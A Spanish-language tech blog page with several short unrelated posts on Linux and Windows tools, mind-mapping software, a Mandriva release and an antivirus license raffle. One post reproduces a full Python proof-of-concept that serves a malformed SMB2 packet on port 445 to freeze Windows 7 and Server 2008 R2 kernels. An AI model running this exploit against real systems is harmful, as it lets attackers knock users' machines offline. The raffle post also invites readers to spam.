Rincón Informático

Muy seguramente muchos de ustedes queridos lectores conocen  y han utilizado el famoso programa Hacha, el  cual nos permite en Windows  cortar  un archivo, para posteriormente unir sus partes y que todo quede igual que antes.

En el amplio mundo del Software libre, nos encontramos con Dalle un programa muy SENCILLO de usar,  pero muy potente y útil, cumple la misma función  que el famoso Hacha en Windows e incluso me atrevería decir que funciona mejor, cito la web  oficial:

Dalle es un conjunto de librerías y programas para trabajar con archivos cortados por diversas aplicaciones.

En muchas ocasiones nos hemos descargado de Internet archivos que han sido cortados y/o camuflados con una aplicación y nos vemos obligados a bajarnos el programa, que la mayoría de las veces no está disponible para Linux.

Dalle ha venido a solucionar este problema, permitiendo trabajar con una gran variedad de formatos. Así no tenemos que preocuparnos de buscar el programa, sino que simplemente desempaquetados el fichero con Dalle.

Así es, el plus que tiene Dalle es el poder de soportar varios formatos, así  no tendremos la necesidad de  descargar el programa  con el cual fue cortado el archivo, simplemente usamos Dalle y lo unimos. Los formatos soportados por Dalle son:

• Astrotite
• Axman 3
• Easy File Splitter
• File Splitter
• Genérico
• Hacha (1, 2 y Pro)
• KamaleoN (1 y 2)
• MaxSplitter
• SplitFile
• Zip

La instalación es bastante sencilla, en esta pagina encontraran los paquetes de instalación, ya sean .deb, .rpm o si lo prefieren las fuentes.   O si lo desean pueden instalarlo en los repositorios de Debian.

El uso de Dalle es muy intuitivo, primero debemos ejecutarlo de esta forma:

dalle-gtk

En el primer pantallazo  escogemos si deseamos cortar los archivos o si por el contrario lo que queremos es pegar un archivo que esta en partes. Para cortar un archivo seleccionamos el archivo  decimos en cuantas partes lo partiremos y el formato con el cual quedaran los archivos.

Finalmente para unir las partes solo basta con seleccionar la primera parte del archivo  y el programa hará el resto del trabajo.

Como todos saben, Python es un lenguaje interpretado, sin embargo, hay ocasiones en las cuales es necesario crear un archivo ejecutable  para transportar el script y ejecutarlo sin la necesidad de tener el lenguaje de programación instalado.

Existe una herramienta desarrollada en Python llamada PY2EXE, que nos permite crear un archivo .exe a partir de cualquier script de este mismo lenguaje (Python) en ambientes Windows. En esta oportunidad,  daremos a conocer un ejemplo muy básico sobre el uso de PY2EXE para crear de forma fácil y sencilla un ejecutable .exe basándose en un archivo .py

Requisitos

• Python: Obviamente es necesario tener instalado el lenguaje  de programación, en entornos GNU/Linux ya viene incluido, pero como estamos trabajando con otros ambientes privativos, debemos descargar el instalador desde acá y proceder con la instalación.
• Py2Exe: Descargamos la herramienta que nos facilitara el proceso de la creación del .exe descargar aca
• Es fundamental tener listo el script el cual queremos convertir en .exe

Creando el ejecutable de Python

Teniendo las herramientas necesarias instaladas en nuestro PC procederemos a crear un archivo  .py que lo llamaremos setup en el cual   definiremos las opciones para  nuestro ejecutable, un ejemplo de un archivo setup.py muy basico seria el siguiente:

from distutils.core import setup
import py2exe
setup(console=['script.py'])

Donde script.py es nuestro archivo de python el cual queremos crear en  .exe

Si queremos algo mas personalizado podemos agregar diferentes parámetros a nuestro setup.py por ejemplo:

from distutils.core import setup
import py2exe 

setup(name="nombre aplicacion",
 version="0.0",
 description="Una pequeña descripcion",
 author="autor",
 author_email="email del autor",
 url="url del proyecto",
 license="tipo de licencia",
 scripts=["script.py"],
 console=["script.py"]
)

Con esto nuestro ejecutable se ejecutara en una consola, pero si deseamos que se ejecute en una ventana cambiamos la linea console=["script.py"] por esto:

windows=["script.py"]

Por ultimo  procedemos a  crear el ejecutable, es importante aclarar que  tanto el archivo setup.py y script. py deben estar en la misma ruta. Asumiendo esto, creamos el ejecutable:

1. Abrimos un simbolo del sistema (como llaman a la consola en Windows)
2. Nos ubicamos donde tengamos  los dos archivos .py (si no saben manejar la consola de Windows, en la red hay miles de articulos que ayudan a defenderse un poco en ella)
3. ejecutamos el siguiente comando

python setup.py py2exe

Si todo ha salido bien, tendremos una carpeta  llamada dist donde estara nuestro ejecutable  con todos los archivos necesarios para su ejecucion. ¿Pero que pasaria si quisieramos que todos estor archivos fueran incluidos en el ejecutable .exe, es decir que el resultado sea solo un archivo.exe?

Para hacer esto debemos modificar nuestro archivo setup.py de esta forma:

from distutils.core import setup 
import py2exe 
 
setup(name="nombre aplicacion", 
 version="0.0", 
 description="Una pequeña descripcion", 
 author="autor", 
 author_email="email del autor", 
 url="url del proyecto", 
 license="tipo de licencia", 
 scripts=["script.py"], 
 console=["script.py"] 
 options={"py2exe": {"bundle_files": 1}}, 
 zipfile=None
)

Volvemos hacer el punto 3 y como resultado en nuestra carpeta dist tendremos un solo ejecutable listo para correr el cual incluye todas las dependencias que este necesita.

Pata hacer esto desde GNU/Linux no encontre alguna forma posible  aparte de emular el python y el py2exe con wine, si algun usuario tiene idea de como hacer este proceso en GNU/Linux me gustaria que nos comentara como  es el proceso.

Leyendo los feeds  me encuentro con esta noticia, se trata de un nuevo fallo en el sistema operativo de moda: Windows 7

Este bug permite  a los atacantes  bloquear la maquina victima lo cual  obliga a  reiniciar para tener otra vez control sobre la misma. En la pagina del investigador que dio a conocer el fallo (Laurent Gaffi)  explica  como funciona esta vulnerabilidad la cual se encuentra nuevamente en el protocolo SMB,  y afirma que no es posible la ejecucion de codigo remoto, ya que  el codigo de explotacion afecta al kernel de Windows 7 y Windows Server 2008 R2, disparando un bucle infinito.

Comparto el codigo de explotacion:

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

class SMB2(SocketServer.BaseRequestHandler):

 def handle(self):

 print "Who:", self.client_address
 print "THANKS SDL"
 input = self.request.recv(1024)
 self.request.send(packet)
 self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

Que raro que el protocolo SMB este presentando tantos problemas de seguridad,  ya que anteriormente  se han hecho publicos algunos fallos que afectan este mismo  protocolo como  la vulnerabilidad  BSOD  (pantallazo azul) que afectaba a Windows Vista, Windows 7 y Windows server 2008

Un mapa mental es un metodo de análisis que permite organizar con facilidad los pensamientos  y utilizar al máximo las capacidades mentales.  (Como crear mapas mentales Tony Buzan).

Nunca me gustó del todo la preparación de temas para exposición con diapositivas, independientemente del tema el proceso en sí es aburrido (esto es relativo..). Los mapas mentales, conceptuales, nos permiten explotar al máximo nuestras capacidades mentales y  ser un poco más espontáneos a la hora de exponer.

FreeMind es una herramienta  escrita en java, que nos permite elaborar mapas mentales. Dentro de sus opciones podemos destacar:

- Permite exportar el mapa mental a formato: Pdf, Flash (Desde la versión actual), odt, Html, Png…

- Crear un mapa cifrado

- Importar mapas de Mind Manager

Ejemplos: 1 , 2 ,   Descargar

Podemos alternar nuestros mapas mentales con los conceptuales utilizando VUE:

Recursos:

- WikiMindMap:  Crea los mapas  mentales dado un concepto.

- VYM : Otra herramienta para la elaboración de mapas mentales

- Libro : Como crear mapas mentales de Tony Buzan

- Mind-Mapping: Información actualizada de  software para la creación de mapas mentales

Estoy pendiente a cualquier duda sobre la instalación de las herramientas.

Desde hace más o menos 2 meses tengo los feeds en los famosos +1000, de verdad que quiero leerlos, sin embargo entre el trabajo y la Universidad se me esta yendo el tiempo entre las manos, y eso que no me gusta quejarme de que no tengo tiempo.

Hace poco más de 5 días la gente de Madriva liberó su última versión de este Sistema Operativo, Madriva Linux 2010.

Viene bien actualizada la distribución

• Gnome 2.28.1
• KDE 4.3.2
• Ultima versión de Open Office
• Smart Desktop (Configuración rápida de escritorio)
• Moblin

Si, Moblin, para quienes no saben que es Moblin: es un ambiente de escritorio diseñado para Netbooks (Acer One, HP mini, Dell mini…, de los cuales ya hemos hablado) este ambiente tiene un arranque rápido y esta optimizado para el consumo eléctrico.

Madriva es un clásico de las distribuciones de GNU/Linux, es toda una empresa acompañada por la fama de dos distribución que hicieron época, Conectiva y Mandrake, a esta última le debo haber comenzado con el mundo del software libre y es por ello que me trae tan buenos recuerdos.

Descargar

¿Qué Distribución de Madriva elegir?

Entrada dedicada Para mi hermada “Recuerde que Cecilia y Jhon Jairo la quieren mucho”.

Este truco  puede que no sea de mucha utilidad, pero sin embargo para cualquier geek es agradable y cómico  ver un poco de arte ASCII.

el paquete que hace posible dibujar una imagen normal    en arte ASCII se llama caca-utils (Que buen nombre, ¿sera que describe lo útil que es nuestro paquete en mención?),  este esta en los repositorios  y se puede instalar usando  el comando mágico.

apt-get install caca-utils

el modo de uso es bastante sencillo,  esta es la sintaxis:

cacaview ubicacion_de_la_imagen.jpg

y el resultado sera algo como esto:

¿A que no adivinan que imagen es?

Igualmente caca-utils tiene otras opciones  algo interesantes y cómicas, los invito a todos los geeks a que  prueben este paquetico, y por que no hagan una foto suya en ASCII.

Indudablemente muchas empresas tienen infraestructuras de autenticación y servicios de Catálogos y muchos, por no decir la mayoría, han sido llevadas a cabo por medio de productos de Microsoft como el muy famoso Active Directory (directorio activo).

Para las personas que no saben que es el Active Directory dejo una pequeñísima descripción:

El directorio activo es una tecnología de Microsoft que provee una variedad de servicios:

• Servicios de directorio (LDAP)
• Autenticación basada en Kerberos
• DNS

Usando la misma base de datos el Directorio Activo permite a los administradores pueden asignar políticas, instalar software o aplicar actualizaciones en los equipos sobre los cuales se tiene DOMINIO.

Para qué son cosas, pero la verdad es que es uno de los pocos servicios en los que usaría Microsoft, de hecho, uso Active Directory.

Ahora bien, para las personas que trabajamos en IT bien sea administrando el AD (Directorio Activo) o para las personas que tienen que ver con seguridad resulta ser muy útil tener un sistema de reportes que indique rápidamente estados de AD.

Es así como llego a mis manos una herramienta gratuita llamada Gold Finger, en esta versión gratis permite ejecutar los reportes de “seguridad” sobre un Directorio activo.  La instalación no es mas allá de un par de “siguientes” se puede ejecutar en CUALQUIER maquina que este dentro del dominio a auditar lo único que hay que tener en cuenta es el Ámbito del reporte, pues se debe digitar con el DN apropiado, ejemplo:

Si nuestro Dominio es: rinconinformatico.net

Nuestro DN es: dc=rinconinformatico,dc=net

Una herramienta bien interesante que por lo menos, vale la pena probar.

Descargar

En Rincon Informático nos preocupamos frecuentemente por la seguridad de nuestros visitantes, por ello hemos escrito varios artículos acerca del tema, algunos como reflexiones, otros como consejos y unos pocos sobre herramientas para mantener la confidencialidad de la data, una de las premisas de la seguridad de la información.

En esta oportunidad traemos un año de licenciamiento gratis en uno de las mejores Suite de seguridad que existen en el mercado ESET Smart Security Home Edition (NOD32).

¿Por qué ESET Smart Security Home Edition es bueno? Hay varias razones que hacen que ese sistema sea de los mejores: La rapidez de ejecución, su sistema de heurística para las detecciones de posibles amenazas por comportamientos y obviamente su constante actualización (Todo eso construido sobre el afamado y galardonado NOD 32), ademas: integración de Anti-Virus, Anti-Spyware, Firewall y Anti-Spam.

Bases del concurso.

• Para entrar en este concurso debes tener un WEBlog.
• Debes hacer una entrada enlazando esta, debe llegar un trackback sino llega entonces haces un comentario contándonos sobre tu entrada.
• La rifa termina en un mes, haciendo cuentas el 04 de Diciembre de 2009.
• Gana la persona que por medio de su blog mas REFERIDOS traiga a Rincon Informático, según estadísticas de Google Analytics, para que TODO sea de confiar, como siempre grabaremos un video y lo subiremos para que vean los datos por ustedes mismos.
• Se rifa una licencia de ESET Smart Security Home Edition por un año, para que hagas uso de esta SUITE de Seguridad.
• Señores se vale hacer todo el SPAM que crean necesario.

Yo de ustedes haría la entrada lo antes posible.

Esperamos entonces que gane el mejor y hablaremos del tema el 4 de Diciembre!!!

Larga vida a la seguridad Informática y a Rincon Informático!!!

Los viejos usuarios de GNU/Linux sabran que si tienen algun problema  con el servidor X  lo pueden reiniciar  aplicando la combinacion de teclas CTRL + ALT + BACKSPACE.

Sin embargo, para aquellos usuarios de Debian Squeeze, Ubuntu 9.04, Ubuntu 9.10  y derivados, esta funcion esta deshabilitada por defecto,  ¿Porque? no lo se, pero a mi parecer, esta combinacion de teclas es de suma importancia por que nos permite  reiniciar las X, en el momento que haya algun cuelgue del sistema debido a un problema con el mismo.

Para habilitar esta funcion en estas distribuciones, se puede hacer por diversos caminos,  en esta ocasion explicare un metodo bastante sencillo el cual consiste en  poner esta linea  en una consola:

setxkbmap -option terminate:ctrl_alt_bksp

Con esto la combinacion  nos funcionara simplemente  por la sesion que esta activa, para hacer que este cambio permanezca siempre debemos editar nuestro bashrc y  adicionar esa linea:

cd /home/tusuario

nano .bashrc

adicionamos la linea:

setxkbmap -option terminate:ctrl_alt_bksp

guardamos y volvemos a construir el archivo asi:

source  .bashrc

Ahora nuestra combinacion quedara activada para nuestro usuario y podremos reiniciar nuestro servidor X de la misma manera que lo haciamos en Lenny, y  versiones anteriores.